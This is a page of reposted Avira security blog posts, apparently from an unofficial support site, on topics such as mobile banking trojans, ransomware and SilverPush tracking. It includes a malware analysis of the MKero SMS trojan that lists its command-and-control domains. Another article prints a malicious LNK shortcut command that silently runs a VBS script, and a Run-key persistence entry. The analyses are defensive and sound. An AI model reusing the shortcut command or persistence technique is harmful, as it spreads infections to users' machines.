Mobile Banking Threats: Secure your mobile device

mobile-infographic

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

Nowadays, we tend to use our mobile phone for browsing on the Internet much more than we do with our PC.  The reason is that it is easier and handier to read an email or pay a bill using our mobile device than to turn the PC on, wait for the browser to load and so on. Unfortunately, we do not pay the same attention when it comes to our smartphone’s security as when it comes to our computers. This is the cause of over 4 million financial attacks targeting mobile phones only in 2014. In 2012 alone, one of the most renowned mobile banking threats also known as Zeus stole about 47.000.000$.

It’s safe to say that phishing emails and infected websites are the weapons of choice to secretly install malware on victims’ phones. Cyber attackers usually wait until their victims log into their online banking accounts to steal their passwords and usernames. With an accomplice – injected code – they secretly add fields to the banking portal, asking for mobile phone numbers. In order to intercept SMS messages, including authorization codes from the bank, they use an infected app, which is sent to the victims as a “security app” via SMS, requesting them to install it. It is very important to know that the bank appears as the “sender” of the SMS.  That’s the reason why many people tend to trust this sort of SMS without realizing that their bank account will soon be drained.

Avira helps you avoid this type of cyber-attacks by offering a host of high-end security apps on both Android and iOS platforms. Important features such as blocking all banking Trojans and infected apps from ever getting onto your smartphone or pinpointing your phone’s location on a map will help you increase the level of security and protect your private data.

When in the modern Wild West, do as banditos do. You can rely on Jesse James’ 6-step Guide  to counter work the tactics used by gunslingers, hardened banditos and garden-variety hackers. Once you read it, you should be sure that outlaws have no chance to threaten your smartphone’s security.

Source : blog.avira.com

Avira Tech Support : Blog

Avira Antivirus Scout: On Early Access – Updated 2017

Avira-Update

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

Update 2017

We learned a lot. More languages were added. Bugs fixed. The product now is at a stage where it can leave the Early Access phase … and where we remove the “Early access” sign from the download button.

Original Post

Did you know:  Our Avira Scout browser is finally freely available for everyone as an early access version. There are a few things you might want to know though, before downloading it.

Why Early Access?

The short version: Chicken or egg?

To test our user interface, we have to invite as many different people as possible. To achieve this diversity, we wanted to present the user interface not only to our beta testers – who tend to be very technical skilled – but to the broader public.

In addition to that we’re also partnering with several open source projects. We announced that we will use their technology in our browser but having the prototype available for them only when the partners have to sign some legal letter is not satisfying.

That’s the reason why we decided to release the browser as soon as it has serious benefits for the users – which is NOW: https://www.avira.com/en/avira-scout/

It is important to mention that the Beta test will continue and will soon receive the next iteration of our Scout browser.

What to expect

If you are the run of the mill user who runs an out-of-the-box browser without any security modifications in form of add-ons, this browser will be quite a bit more secure than that. If you know what you are doing though and have a browser with AdBlock, anti-tracking, our ABS, a good search engine, and NoScript your browser should actually be more secure than our current setup. This will change of course.

How often can you expect updates

Avira Scout will be updated when Chrome updates or when we are releasing bugfixes. Our early access phase will be running for a couple of months while the browser will receive new features and improvements.

The extensions and the menu will be updated more frequently.

Known issues

Your feedback helps us build the fast, secure browser you’ve always wanted. That’s why we release early. Naturally there are still kinks and we hope you’ll help us smooth them out.

Known issues we’re working on:

  • Not all video and audio pages will work just yet: only open video codecs are currently offered. Learn more!
  • HTTPS-Everywhere and Privacy Badger may not support certain pages. Please give us your feedback to help us fix this.
  • Languages offered: German and English. The installer is in English only. We’re working of course to expand the list of available languages.
  • Not all features (e.g. desktop links) work on Windows 8 just yet.
  • Coming up: integrated antivirus scanner – working on it!

Source : blog.avira.com

Avira Tech Support : Blog

Consumer Reports recommends Avira

avira-antivirus-security

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

Got a new computer for Christmas? Consumer Reports, America’s leading source of independent product reviews, has published its list of recommendations on how new computer owners can best set up their shiny new machines.

Security is at the very top of their list. They recommend ditching the pre-installed antivirus software that came with the new machine and replacing it with a free option – like Avira Free Antivirus. “In our test, it did a very good job of protecting against most threats,” wrote Donna Tapellini in her article.

Her other recommendations included ways to easily transfer old files over to your new machine, backup the hard drive, upgrade software, connect with the cloud, and yes, improve the sound quality. You can read her article here.

The detailed Consumer Reports guide to security software and product ratings is available online only to subscribers. If you are in North America, you will need to buy a copy at the local newsstand or visit your local library.

Consumer Reports, for those outside of America, is considered one of the fiercest and most independent consumer advocacy publications anywhere. Their reports on everything from cars to consumer electronics have the power to move stock markets — as several car manufacturers have discovered to their dismay. In the continental European market, the closest comparable organization is Siftung Warentest and its Test.depublication.

Source : blog.avira.com

Avira Tech Support : Blog

Ransomware “Tesla”: Are ransomware writers kidding us?

ransomware_avira

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

Most of us have probably seen e-mails like the one below in our inbox at one point or another:

phising

This is basically the typical phishing email sent out by cybercriminals. They want to get the victim with “evil” social engineering: In order to succeed they try and make the user open the invoice using scare tactics like unpaid bills, invoices, lost packages, and so on. The icing on the cake is the attached copy of the “invoice” so it can be opened ASAP.

In comparison to the other phishing emails we received before, they don’t insert the original “Tesla” ransomware file anymore. Instead they put an obfuscated JavaScript file inside the archive. Cool! That makes them more flexible than ever before.

java_obf

The obfuscation is a pretty good one from my point of view. It doesn’t allow anyone to understand what’s going on. But nothing is perfect … enough ;-). It may take several tries but you can decode the script. This easy decryption leads me to the conclusion that they have automated its creation. Well, it seems that even the world of the criminals is changing.

An interesting fact is that to deploy ransomware, no knowledge of any programming language is needed anymore: Everything is offered ready to go on the darknet for anyone who is willing to pay. You can read a cool article I wrote on this topic over here.

java_dec

But let’s get back to the malicious script. It’s just a downloader. It shows the download source for the “Tesla” ransomware, where it will be stored on the system (e.g. %temp%), and it also takes care of running the binary after running some “quality checks” like file size.

Interesting? I believe so, because the criminals have changed the way they ensure that the ransomware is downloaded to the victim’s computer. They now also have the possibility to use different URLs as sources. And, last but not least, it seems to be easier for them to deploy new scripts than to make adjustments to the binary itself when it comes to by-passing antivirus solutions in order to stay undetected. With more samples to choose from they have more possibilities to successfully infect your device.

You might be confused about the last sentence, but let me explain: Once we analyzed the Tesla ransomware file in more detail, it seemed like they didn’t invest any additional time in their “Tesla” ransomware files itself. The latest and newest binaries which we have received and analyzed are already covered by our detections from more than three years ago! That’s friggin’ old-school  🙂 !

how to restore small

Nope, that’s no joke. We’ve also seen that – after executing yet another script –  instead of the Tesla ransomware binary, the latest Avira launcher is being downloaded. We know that they took our launcher and put it on their commanding control server.

launcher

Please note: You should know that we NEVER collaborate with cybercriminals or force something like this! We also don’t spread malware with our launcher! But we want to say thanks to everyone who wants to promote our product for better protected world detections nonetheless! 🙂

In the end it shows us once again how strong our detection pattern is when it comes to daily threats. It’s funny to find “new” samples which we’ve already been detecting for more than 3 years. But anyway, don’t forget our Avira Protection Cloud: in combination with our main antivirus, it becomes a powerful tool and a much stronger protective shield! So, ENABLE the Avira Protection Cloud in our product – and live free.

Source : blog.avira.com

Avira Tech Support : Blog

How much is your streaming account worth?

avira-free-antivirus-expert-mode

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

In fact, more and more people seem to do so. And it’s no wonder – choosing what you want to watch and when definitely has a lot of pros. With its rise in popularity it should come as no surprise that account theft for those (and other) online services is hot, too. So how much would one have to pay to get access to someone else’s account? Apparently not much.

According to The Register “premium sports accounts sell for about $10 while streaming TV can be bought for as low as 50 cents, far less than the $10 monthly subscription.

Comic fans can buy a stolen Marvel Unlimited lifetime account – meaning the victim is unlikely to shutter it – for 50 cents compared to the $10 monthly fee.”

The Marketplace, which is accessible via the Tor network, also offers premium Spotify, ComCast Xfinity, Uber, Apple, and Lynda training video accounts as well as drugs, weapons, malware, and of course credit cards.

The stolen accounts also come with some care instructions for the “new” (and apparently not too bright) owners: Make sure not to change the email address or the legitimate owner will notice.

So, now that you know how much your account might be worth out there in the wild (not a lot apparently, compared to what you are paying for it), you should make sure that it remains your own and will not be sold to who knows how many other people.

  • Make sure you are using a good antivirus that will guard your PC from trojans, keyloggers, and other malware.
  • Use a unique password for each of your accounts. Make it a good one.
  • Change your password regularly.

Source : blog.avira.com

Avira Tech Support : Blog

Avira now identifies SilverPush ad-tracking as malware

silver_plus_avira

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

Even worse, they are doing it right in front of you – but you don’t know it.

Welcome to the world of cross-device tracking where the only thing you have to lose is your privacy as an autonomous human being.

This is no nightmare futuristic scenario, it is now. But it does not have to be for people using Avira antivirus software.  Avira, the German security company, now detects the SilverPush tracking software as Trojan malware.

Devices running Avira security software will now warn users if this software is present or about to be downloaded. If the software is already present, Avira will either remove or block it from operating. The new detection will protect the millions using Avira security software or the Avira anti-malware engine in their device.

SilverPushThe SilverPush technology enables advertisers to put an ultrasonic “sound beacon” signal into TV commercials which people can’t hear – but their devices can. This signal can be heard by apps which have SilverPush software – and they respond with a message sent back to SilverPush – identifying where the ad was seen and the precise broadcast channel. That’s just the start: The message also identifies the exact ID of the device, the Wi-Fi router MAC address, details about the device’s operating system, and best of all – the user’s phone number.

After putting the pieces together, SilverPush and its clients can have a very detailed portrait of the end consumer preferences. It’s a marketing dream – a technology that enables cross-device tracking and targeted ads – but who is taking care of the user and their need for privacy?

“What user privacy?—and this is a big, big problem for us,” says Travis Witteveen, CEO of AVIRA. “The functionality of the SilverPush software is way out of line for a legitimate advertising software development kit – given the way this software sucks up data on the individual user, the extent of this data, and the insecure transport of this data back to SilverPush – so we are now detecting this as a Trojan.”

Analysis from the Avira Virus Lab shows the detailed level of user data sucked up and broadcast by SilverPush. “They even transmit the user’s phone number – which is certainly classified as personally identifiable information … along with other data like the device’s IMEI or MAC address – details which identify the individual device,” pointed out Mr. Witteveen. “With this amount of data, SilverPush could order and deliver a pizza for viewers when they sit down to watch a Western on TV.”

SilverPush is not the only tech firm working on cross-device tracking. Others active in this area include Adobe, Drawbridge, and Flurry. But thanks to the way SilverPush sucks in and handles user data, they have been at the center of a media storm involving the US Federal Trade Commission and its review of cross-device tracking of users by marketing firms.

“The best solution is increased transparency and a robust and meaningful opt-out system. If cross-device tracking companies cannot give users these types of notice and control, they should not engage in cross-device tracking,” stated the Center for Democracy & Technology, an American advocacy group for internet privacy in a letter to the FTC.

At Avira, we agree with this position. And until these details are figured out, we will identify SilverPush for what it is. As the CDT has pointed out in the same letter, privacy is important and recent polls show that 91% of Americans feel like they have lost control over the way their personal data is being collected and used.

Source : blog.avira.com

Avira Tech Support : Blog

Avira, time2win and eSports … it’s time to win!

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

For those of you who don’t know what eSports is, let me explain. eSports is short for ‘electronic sports’ and is a term for competitive video gaming. It’s exactly what you probably think it is by now: Two gamers sitting in front of their PCs, playing games against each other. So far, so good. But eSports is more: It’s professional gamers sitting in front of their PCs, playing live before an audience of several thousand spectators, competing for a huge prize pool. eSport players are becoming almost as famous as the ‘real’ sport stars with fans screaming their names and them giving autographs. The latest huge tournament, the League of Legends World Championship finale in Berlin, Germany, sold out their 17,000 tickets in just 90 seconds. You find this unbelievable? Then take a look at this video.

As of now, this fame and fortune is only reserved for the best – and that’s where our new partner, time2win comes in. “We strive to elevate eSports onto a new level”, says Björn Rüssel, COO of time2win in the press release. “Competitive eSports including prize money should be accessible to everybody. Everybody deserves a realistic chance to win prizes!”

Besides time2win-tournaments, with prizemoney set by time2win and its partners, other modes like challenges and buy-in-tournaments will be usable on the platform as well. “We know, that players don’t just want to participate in our own tournaments, but also try and test the other features we offer. The starting capital for our money features can be won in our time2win tournaments”, comments COO Björn Rüssel.

By the way, the best time to join the fun is now, with the stress test starting on November 9th. In this open test phase of the platform, 41,000 euros will be distributed as prize money and gaming equipment worth over 10,000 euros will be raffled off.

With all the fun you’re having, you shouldn’t forget the most important thing: Make sure that your PC stays secure – and that’s what we from Avira are here for.

Source : blog.avira.com

Avira Tech Support : Blog

Dissecting MKero, the premium SMS service subscriber trojan found on Google Play

Avira-Av-Test

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

In this malware-everywhere context, the best way to stay safe is to install software only from trusted locations, like Google Play. Starting with 2011, Google managed to reduce the amount of malicious applications in its store by using an in-house automated antivirus system, called Google Bouncer.
However, since nowadays everything is continuously evolving and adapting, nothing is bulletproof and the bad guys found various ways (e.g. delayed backdoor trojan, dendroid malware) to trick the automated checker and upload malicious apps in the official store.

This is also the case for today’s case study – a trojan from the MKero family which was recently discovered in Google Play masked as normal gaming applications:
com.likegaming.gtascs (md5 14cdf116704af262174eb0678fd1b368), com.likegaming.rcdtwo (md5 39b84a45e82d547dc967d282d7a7cd1e), com.likegaming.ror (md5 69820ddcab4fe0c6ff6a77865abf30b9), com.likegaming.rprs (md5 8c496957d787861c0b11789a227a32c7), com.likestudio.offroadsimulatoreone (md5 c7478eff0c2eca8bcb5d0611bfec54d6).

This type of malware was discovered in 2014, but for the first time is now found in the official Google Store – which means that its developer(s) added special code to bypass Bouncer. Once installed on the device, the trojan’s logic is very simple: it secretly subscribes the victim to premium SMS services for which the user will be charged monthly with a minimum of $0.5 per message. In addition to bypassing Bouncer, the main peculiarity of this malware is its ability to automatically “resolve” the CAPTCHA image required in the subscription process, by sending it to an online image-to-text real-time service. Furthermore, this trojan is completely silent during the installation and, more importantly, during the infection time by hiding any incoming SMS sent by the premium subscription services.

How exactly is it doing its “thing”?

We know what this trojan does and how it passes the most complicated task (CAPTCHA decoding), so it will definitely be worth to dig further in its internals to find out how it works exactly.

For our analysis, we’ll use the com.likegaming.gtascs (md5 14cdf116704af262174eb0678fd1b368) apk from the above mentioned list of infected packages.

Let’s start by checking the internal APK structure – this can be done by extracting it (or just by listing the files) with any zip tool (e.g. unzip, 7-zip, winzip):
$ tree -L 2
├── AndroidManifest.xml
├── assets
│   └── bin
├── classes.dex
├── lib
│   ├── armeabi-v7a
│   └── x86
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   └── MANIFEST.MF
├── res
│   ├──[skipped res folders]
└── resources.arsc

Nothing special so far, all the usual files (manifest, classes, resources) and folders (res, lib, assets) are there and they seem to contain usual APK data.

Since the AndroidManifest.xml file is the entry point of any apk, we’ll continue the analysis here. In order to convert the binary XML into the human readable format, we need android-apktool which will also do some extra decoding required later:
$ apktool if com.likegaming.gtascs.apk
I: Framework installed to: $HOME/apktool/framework/127.apk
$ apktool d com.likegaming.gtascs.apk
I: Using Apktool 2.0.1 on com.likegaming.gtascs.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: $HOME/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

From the decoded XML file, one can usually check various tags/elements like: package name (com.likegaming.gtascs, in our case), needed permissions, activities, services, receivers.
When taking a look at the permissions, some of them seem very suspicious (check the highlighted lines) for an application which is supposed to be a normal gaming app:

permissions

Thus, the required permissions are the first suspicious thing about this app and, if the user is properly cross-checking them with regard to app’s scope/description, the installation should be aborted at this point. But, we all know that this wont happen too often and, usually, the required permissions will be simply ignored and accepted by the regular user.

Next, let’s check the main activity declaration – nothing special from the name, so we’ll have to dig in its code later on:

main-activity

There are also various other activities in the manifest, but we’ll first focus on the declared services which, by definition, are background tasks that are run even when the user is not interacting with the application. There’s not much information though, just some suspect names for the services starting with Mk:

services

Things are getting more interesting for the receivers part – there are 2 of them having a priority of 1000 in the intent-filter element:

receivers

From the information extracted from the manifest file we’ve found the following: suspect permissions, the name of the main activity, the services which can be started by the app and 2 high-priority receivers (one for the SMS_RECEIVED intent and the other one for the BOOT_COMPLETED intent).

It’s now time to start looking into the code after every important activity/service/receiver found above. For this, the file classes.dex, which is in Dalvik VM format, must be decompiled into a human-readable format; we already decompiled it to smali/baksmali with the manifest file conversion, but it’s also possible to convert the dex to jar and then open the jar file with a java decompiler, like jd-gui, in order to view the java code.

Analyzing the main activity, com.unity3d.player.UnityPlayerActivity, appears to be a dead-end because it’s basically calling code from the legit game engine framework, com.unity3d. Therefore, nothing malicious is happening when the user is actually opening and playing the game. That being said, it means that the malicious code is activated by other means, like broadcast receivers. So let’s continue by checking the code of the 2 high-priority broadcast receivers found in the manifest – com.mk.lib.receivers.MkStart and com.mk.lib.receivers.MkSms.

The first receiver, com.mk.lib.receivers.MkStart, which is called whenever the phone is (re)started, is creating an intent which repeatedly starts (using 1h delay) a new service, com.mk.lib.MkProcess:

MkStart

Looking at the onStartCommand method of com.mk.lib.MkProcess service, it appears that this one is starting a new background thread that executes the com.mk.lib.MkProcess$Commands.doInBackgroundmethod which is doing the whole magic (communicates with the C&C servers to get the URL(s) of the SMS premium servers and then starts the registration process):

doInBackground

Now let’s try to find the C&C domains which seem to be returned by the com.mk.lib.heplers.Functions$getDomains (notice the spelling error – heplers instead of helpers) method. Unfortunately, my version of jd-gui tool is unable to decompile the com.mk.lib.heplers.Functions file (probably because of the obfuscation), thus we’ll look into the smali code instead – smali/com/mk/lib/heplers/Functions.smali file. From its smali, the method is calling another private method, com.mk.lib.heplers.Functions$appDomains, which seem to directly return the name of the used domains:

appDomains

Unfortunately, as it is the case with the whole application, the strings are heavily obfuscated (see highlighted areas), so they do not make much sense in this form. Luckily, the domains seem to be in-place decoded with the com.mk.lib.heplers.Data.Http.V method. Looking at the decoding method, one can see that it’s doing a lot of heavy stuff (multiple loops with various bitwise operators) and can’t be easily reversed, so we need another way to obtain the original strings.

Since the method is implemented in the decompiled jar, we can create a simple java program which simply calls the decoding method with the obfuscated string as input. While trying to do so, you’ll get a java compilation error because the decode function is defined as static and is not accessible from the exterior of the package. Fortunately, this can be bypassed using java reflexion – I have implemented a simple java program which loads the method, makes it accessible, then calls it with the provided input and, in the end, prints the result on standard output:

MethodCaller

Finally, running the above java program with our strings, we get the following results:
$ java -cp .:classes-dex2jar.jar MethodCaller 'com.mk.lib.heplers.Data$Http' V "obfuscated_string_1" "obfuscated_string_2"

nosepudymy.biz,areripydok.com,vozicokeboh.biz,hekisanosih.com,yfaqoqysusyfyfa.biz,dewekasadito.biz,zerawyhifuwude.biz,eluheqizomado.biz,ufadaqim.biz,imuwobulok.biz,horodityrowoboni.biz,uqikoxomyturo.biz,wyfokypynogipu.biz,sabumorazuh.biz,ofudylopixen.biz,episykuj.com,rodujuhocafy.biz

ivosupawy.biz,cesobagixisyn.biz,menizyxoxa.biz,ruqijireji.biz,ecymotolimybocos.biz,ozozoqimykoric.biz,fyvefiwo.biz,zehenivi.biz,lytevabasic.biz,ynegymeriw.biz,jytuvyducemek.biz,isucuzyzososare.biz

Thus, the malware tries to communicate with the first responsive C&C server from the above lists and, once it gets a response, it will start the SMS subscription process.

Another interesting service is com.mk.lib.MkPages which handles the CAPTCHA: after extracting the image from the subscription page, it’s sending it to http://antigate.com and then is waiting maximum 2.5 minutes to receive the text. Check the following highlighted text from the com.mk.lib.MkPages$doInBackground method, after deobfuscating the strings:

antigate.com

Let’s move now to the 2nd receiver, com.mk.lib.receivers.MkSms, which will be called before any other broadcast-receiver (due to its high-priority, 1000) whenever the device is receiving a SMS message. After decoding the strings from its onReceive method, one can see that this service is responsible with the SMS code and activation link extraction needed in the subscription process and, also, with blocking of further SMS messages coming from the subscription server:

MkSms

This is pretty much all about the internals of this trojan and, coming back to the Bouncer bypassing, we can see now that the malware passed undetected due to the delayed infection (i.e. is waiting 1h in order to start the subscription process).

In conclusion, no matter how smart the (automated) application checkers are, the bad guys will always find new and sophisticated methods to infiltrate malicious code even in official stores. In this circumstances, Avira is helping you to fight against potential malware – so don’t wait to be infected and install our free Android product today.

Source : blog.avira.com

Avira Tech Support : Blog

LNK Files – Shortcuts to Faster Infections

lnk_shortcuts_system_drive

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

These shortcut files are actually called Shell link files. Microsoft filename extension: “.LNK”

Let’s dig a little deeper and check the typical properties of an example LNK file. Just right click on the shortcut and then select “Properties. There are now several options which can be changed. In this case we will focus on the “Target” field which contains the path to the application or folder.

“C:\Program Files (x86)\Avira\Avira Antivirus\avcenter.exe”

Looks easy, right? When you click on the shortcut it performs the command specified here. In this case our trusted Avira Antivirus is being launched. This is actually what you can expect and want when clicking on a shortcut.

Unfortunately these shortcut files also have drawbacks since you don’t know exactly what hides behind them without explicitly looking. At Avira we are currently seeing a trend that more and more malware threats are using this kind of propagation method. You can follow this and more trends by visiting our Avira Threats Landscape.

Malware authors are starting to use this method because nowadays most novice users might know that clicking on a suspicious executable file might be dangerous for their systems. But clicking on a shortcut is normally not associated with bad behavior.

I like to show you how malware is actually misusing the usually helpful LNK files by giving an example of an actual in-the-wild malware detection named: VBS/LNK.Jenxsus.Gen

This variant uses LNK files to spread an infection via removable drives. The trick is very simple since it actually creates shortcuts to your files and folders stored on the USB stick and then hides the originals from you.

Let’s see what a folder structure looks like once the USB drive is infected.

Folder View of an infected USB drive:

Folder View of an infected USB drive

Nothing unusual here at first glance, right? Except maybe that the icons have all a small arrow in the bottom left corner which indicates that they are actual shortcut files. But you can still access all your files and folders when clicking on them.

We will now take a closer look at what actually is hidden behind the shortcut files by telling the Windows Explorer that we want to see all “Hidden system files”

Directory view with “Hidden System files” shown.

Directory view with “Hidden System files” shown.

When we focus on the “avira-logo” you can see there are actually two files there. One is the LNK file and the highlighted one is the actual “hidden” jpg image file.

This means when you click on a trusted file on the USB drive you are actually clicking on the shortcut which will execute the following command stored inside the LNK target instead of just opening the image.

C:\WINDOWS\system32\cmd.exe /c start dlbfbiicvg.vbs&start avira-logo.jpg&exit

Target path of an infected LNK file.

What this command does is silently execute the malicious “dlbfbiicvg.vbs” via cmd.exe and then use the “start avira-logo.jpg” to open the file you clicked on to avoid any suspicion.

Additionally the malware also adds Run-Key entries to the Registry to infect other USB drives if they are plugged into the system.  This makes also sure that the malware gets executed with each system boot.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] dlbfbiicvg”=”wscript.exe //B \”C:\\DOCUME~1\\USERNAME\\LOCALS~1\\Temp\\dlbfbiicvg.vbs\””

Example of a malicious Run-Key added by the malware.

The filename and the Registry value of the Run-Key are always randomly generated by the malware on an infected system.

At last the malware can also deploy a backdoor on your computer to send out information about the operating system, sites you visited and so on.

USB drives are still popular because there are very convenient way to transfer large files from one location to another especially if you have limited internet bandwidth available.

So if you want to share some data with a family member or friend, be very careful when you plug-in your USB drive into an unprotected computer. Your USB drive might get infected or vice versa you could spread the infection from your USB drive to his computer.

Of course nobody has the time to check every shortcut this closely before clicking on it.

One easy solution is to use our Avira product which automatically scans for malicious content and will protect you from this kind of malware threat.

Source : blog.avira.com

Avira Tech Support : Blog

Sharing and the fine art of stopping malware

stop_malware_using_avira

Tags :- Avira Tech Support | Avira Support NumberAvira Refund.

There are an array of technical and business issues that have to be solved: What format do the files need to be in? Who pays for the bandwidth? And the list goes on and on.

Regardless of these technical issues, there are a number of advantages to sharing – particularly for the average computer user. This user – let’s call him Joe Six-Pack – gets much faster and deeper information about any potential threats than if he kept news of his malware misadventures all to himself.

Just from the perspective of Avira, cooperation has its organizational costs – but brings clear benefits down the road.

Avira was one of a “Gang of Five” security companies that set up MUTE, the Malware URL Tracking and Exchange back in 2008.

Avira web developers were volunteered by the company and shared their expertise to set up the backend infrastructure for the group’s members to combine and share their collections of malicious web addresses. The initial outline of Avira’s system specs could be placed on four PDF slides. Today, the system is far more complex and requires a whopping 44 slides to describe its operations. And that is not all of the sharing. Avira also founded VIREX, a web-based application for helping security analysts organize their bits and pieces of malicious code, clean samples, and URLs. Yes, Avira is proud of its sharing efforts.

But you could still ask, what does Avira get out of its investment in sharing — addition to fresher bits of malware? I can think of two primary benefits.

1. Greater back-office expertise in coordinating data flows.
2. Experience in collaborative working outside of the company environment.

Put these two advantages together and there is a third one:

3. Avira expertise that can fit under the banner of other companies as an OEM product.

That is exactly what we have done with the recently announced Lavasoft deal. We’ve licensed our new  Avira URL Cloud (MURL) and program classification service (AUC) to Lavasoft and they’ll  use this to beef up the security levels in their Ad-Aware Web Companion.

Sharing is a good thing – whether in a real or a virtual sandbox.  It makes life a better, richer, and yes, more secure experience.

Source : blog.avira.com

Avira Tech Support : Blog